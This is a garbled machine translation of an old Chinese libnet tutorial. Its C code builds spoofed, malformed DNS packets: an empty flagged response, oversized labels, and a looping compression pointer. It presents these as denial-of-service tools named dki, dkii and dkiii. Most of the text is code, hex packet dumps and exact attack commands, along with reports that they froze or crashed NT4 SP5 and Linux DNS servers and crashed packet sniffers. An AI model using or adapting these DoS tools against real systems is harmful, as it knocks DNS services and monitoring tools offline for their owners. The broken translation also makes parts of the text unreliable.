Libnet example (8)

Title: Libnet example (8)

Author: Small four <mailto: scz@nsfocus.com>
Home: http://www.nsfocus.com
Date:

The call came to appreciate the charm of C language programming. Let's look at the function prototype below:

Int libnet_build_dns (u_short ID, u_short flags, u_short num_q,
U_short num_anws_rr, u_short num_auth_rr,
U_short num_addi_rr, const u_char * payload,
Int payload_s, u_char * BUF );

This function is used to construct DNS packets. The meaning of the parameters is not clearly explained by Libnet manual.
I have provided a very detailed explanation in Article (7). For more information, see. Flags and the next four numbers both use
See the method specified as the result. do not perform any conversion. For example, we expect the flags domain to be 0x8000 in netxray,
Specify 0x8000 and number.

The following macro definitions in/usr/include/Libnet/libnet-headers.h:

# Define libnet_dns_h 0xc/* DNS header base: 12 bytes */

First, let's do nothing serious. In a very simple abnormal DNS response group, it is said that the response group in this format will
The DNS server of NT caused DoS attacks, but I did not succeed. I don't know what time it was.

The command line specifies the target IP address. If the source IP address is not specified to use a random number, the number of DNS response groups is displayed.

--------------------------------------------------------------------------
Void dnssend (u_long srcip, u_long dstip, u_long dnsnumber)
{
U_long D;

/* Construct an IP header */
Libnet_build_ip (libnet_udp_h + libnet_dns_h,/* IP data zone length */
Iptos_lowdelay,/* IP ToS */
(U_short) random (),/* ip id */
0,/* frag stuff */
255,/* TTL */
Ipproto_udp,/* upper-Layer Protocol */
Srcip,/* big-Endian Order */
Dstip,/* Target IP */
Null,/* no option */
0,/* Option Length 0 */
Packet);/* point to the IP header */
/* Construct the UDP header */
Libnet_build_udp (53,/* Source Port */
53,/* Target Port */
Packet + libnet_ip_h + libnet_udp_h,/* payload */
Libnet_dns_h,/* payload length */
Packet + libnet_ip_h );
/* Construct an abnormal DNS Response Group header */
Libnet_build_dns (0, 0x8000, 0, 0, 0, 0, null, 0,
Packet + libnet_ip_h + libnet_udp_h );
/* Calculate the UDP checksum. The IP checksum is calculated by the kernel */
Libnet_do_checksum (packet, ipproto_udp, libnet_udp_h + libnet_dns_h );
For (D = 0; D <dnsnumber; D ++)
{
/* Send DNS packets */
Libnet_write_ip (rawsocket, packet, packet_size );
}/* End of */
Return;
}/* End of dnssend */
--------------------------------------------------------------------------

Usage:./dki [-- Si srcip] [-- di dstip] [-- num dnsnumber]

This DOS has not been tested on the Wide Area Network. I don't know which version of the NT DNS server can be paralyzed by a single package.
Multiple packets in the network can freeze the target host. The test results are as follows:

1) 10.60 is NT4 DNS, and it is completely frozen, but it does not affect the ping from 8.90 to 10.60, nor does it affect the provision of IIS
Service.
2) 0.2 is Linux DNS, and it is completely frozen. From 8.90, you cannot Ping 0.2, Telnet 192.168.0.2 53
Failure. It's ironic.

The format of this so-called abnormal DNS response group is as follows:

00 00 00 11 11 11 00 10 14 FF 08 00
45 10 00 28 6e 17 00 FF 11 BB 98 C0 A8 08 5A C0 A8 08 5A
00 35 00 35 00 14 ed 56
00 00 80 00 00 00 00 00 00 00

The last line shows the question at a Glance. The number of questions and answers are all zero, and flags indicates that this is
A forward resolution Response Group. Is it possible, not possible! But for some DNS implementations, it is not an error message,
I tried to explain it.

Too many dos can be imagined in DNS. For example, DNS request groups do not appear normally.
The compression format, in fact, I do not confirm the emergence of the compression format, how the various systems respond to this;
For the implementation of analysis software, they will parse the DNS request groups in a compressed format, and no error is reported.
The opportunity starts like this. If we let the pointer start the loop, netxray tries to decode the message.
Ended. Sniffer Pro 2.6 and later versions defend against this vulnerability. Although it also parses the compression format, it also causes
Infinite Loop, but the boundary judgment does not cause the process to terminate. Do not test
Sniffer.

Why do we need to create this loop in the request group instead of the Response Group? Because the Response Group ID may be
Judgment, and then discarded, although the compression format in the Response Group will be parsed. I can only bet on Systems
DNS calls the same function when processing the problem unit and answer unit, and does not distinguish the current
If I bet on which unit is being parsed, the DNS implementation will be dead. Note: When fighting sniffer
Because the ID is not judged, the request group Response Group does not matter.

What is the length limit for non-compressed formats? If not, it can be expanded infinitely because the end mark is not
Is the length range of 00.

I wrote two other test programs to perform the above-mentioned boundary test. The intention was to deal with the DNS server.
Sniffer.

--------------------------------------------------------------------------
......
Dnsdatasize = 13 + maxiplusone * junknumber;
Packet_size + = dnsdatasize;
Fprintf (stderr, "[DNS killing...] \ n ");
/* Allocate memory and initialize it to zero */
Libnet_init_packet (packet_size, & Packet );
/* Construct some data of DNS packets here */
Dnsdata = packet + libnet_ip_h + libnet_udp_h + libnet_dns_h;
Dnsdata [0] = 0x03;/* WWW */
Dnsdata [1] = 0x77;
Dnsdata [2] = 0x77;
Dnsdata [3] = 0x77;
Dnsdataindex = 4;
For (j = 0; j <junknumber; j ++)
{
Dnsdata [dnsdataindex ++] = Maxi;
For (I = 0; I <Maxi; I ++)
{
Dnsdata [dnsdataindex ++] = junkchar;
}
}/* End of */
Dnsdata [dnsdataindex ++] = 0x03;/* COM */
Dnsdata [dnsdataindex ++] = 0x63;
Dnsdata [dnsdataindex ++] = 0x6f;
Dnsdata [dnsdataindex ++] = 0x6d;
Dnsdata [dnsdataindex ++] = 0x00;/* End mark */
Dnsdata [dnsdataindex ++] = 0x00;
Dnsdata [dnsdataindex ++] = 0x01;
Dnsdata [dnsdataindex ++] = 0x00;
Dnsdata [dnsdataindex] = 0x01;
/* Create raw_socket */
Rawsocket = libnet_open_raw_sock (ipproto_raw );
Dnssend (srcip, dstip, dnsnumber );
/* Close raw_socket */
Libnet_close_raw_sock (rawsocket );
/* Release the memory allocated by libnet_init_packet */
Libnet_destroy_packet (& Packet );
......
--------------------------------------------------------------------------

Usage:./dkii [-- Si srcip] [-- di dstip] [-- num dnsnumber]
[-- Junk junknumber]

During the test, it is found that there is no need to intervene in the pointer to create an infinite loop, as long as the query message is abnormally expanded in non-compressed format.
Enough to terminate the process when netxray parses (decode. For example, when -- junk 4 is started
Netxray: netxray was forced to terminate the decode operation. Sniffer Pro defends against abnormal DNS packets far
Netxray is stable. Lanw.e 3.5 terminates abnormally when attempting to parse such packets.

The abnormal DNS request group sent by dkii is similar to the following description.
3f 61... 61 is the number of units.

--------------------------------------------------------------------------
42 83 ID Identifier, randomization
01 00 The param parameter is used to parse request packets. Recursive Parsing is allowed.
00 01 qtcount problem count
00 00 ancount answers
00 00 aucount management organization count
00 00 adcount other information count

03 77 77 WWW, with a length of 3
3f 61... 61 length field is 63
3f 61... 61 length field is 63
......
3f 61... 61 length field is 63
03 63 6f 6D COM, with a length of 3
00 ends
00 01 type = a record
00 01 class = in -- the ARPA Internet
--------------------------------------------------------------------------

--------------------------------------------------------------------------
......
Dnsdatasize = 15;
Packet_size + = dnsdatasize;
Fprintf (stderr, "[DNS killing...] \ n ");
/* Allocate memory and initialize it to zero */
Libnet_init_packet (packet_size, & Packet );
/* Construct some data of DNS packets here */
Dnsdata = packet + libnet_ip_h + libnet_udp_h + libnet_dns_h;
Dnsdata [0] = 0x03;/* WWW */
Dnsdata [1] = 0x77;
Dnsdata [2] = 0x77;
Dnsdata [3] = 0x77;
Dnsdata [4] = 0xc0;/* pointer = 12, actually pointing to www */
Dnsdata [5] = 0x0c;
Dnsdata [6] = 0x03;/* COM */
Dnsdata [7] = 0x63;
Dnsdata [8] = 0x6f;
Dnsdata [9] = 0x6d;
Dnsdata [10] = 0x00;/* End mark */
Dnsdata [11] = 0x00;
Dnsdata [12] = 0x01;
Dnsdata [13] = 0x00;
Dnsdata [14] = 0x01;
/* Create raw_socket */
......
--------------------------------------------------------------------------

Usage:./dkiii [-- Si srcip] [-- di dstip] [-- num dnsnumber]

The abnormal DNS request group sent by dkiii is similar to the following description and creates a parsing loop, netxray
Terminate. lanw.e 3.5 terminates abnormally when attempting to parse such packets.

--------------------------------------------------------------------------
42 83 ID Identifier, randomization
01 00 The param parameter is used to parse request packets. Recursive Parsing is allowed.
00 01 qtcount problem count
00 00 ancount answers
00 00 aucount management organization count
00 00 adcount other information count

03 77 77 WWW, with a length of 3
C0 0C pointer = 12 pointer appears where the pointer should not appear, parsing Loop
03 63 6f 6D COM, with a length of 3
00 ends
00 01 type = a record
00 01 class = in -- the ARPA Internet
--------------------------------------------------------------------------

Adam works with us to perform the following tests:

Operation./dkii -- Si 192.168.10.60 -- di 192.168.10.60 -- num 5 -- junk 4
NT4 SP5 DNS server crashes.

Operation./dkiii -- Si 192.168.10.60 -- di 192.168.10.60 -- num 5 also causes
NT4 SP5 DNS server crashes.

The above operations require that the source IP address and target IP address be consistent and can be exactly reproduced. dkiii attack speed is fast and dkii attack speed is high.
Then, you have to wait a moment to see the effect. Net start DNS can be restored.

SP6 is invalid. Currently, the source IP address equals the target IP address in the network structure.
Launch an attack on the local network. The dos of DNS has come to an end.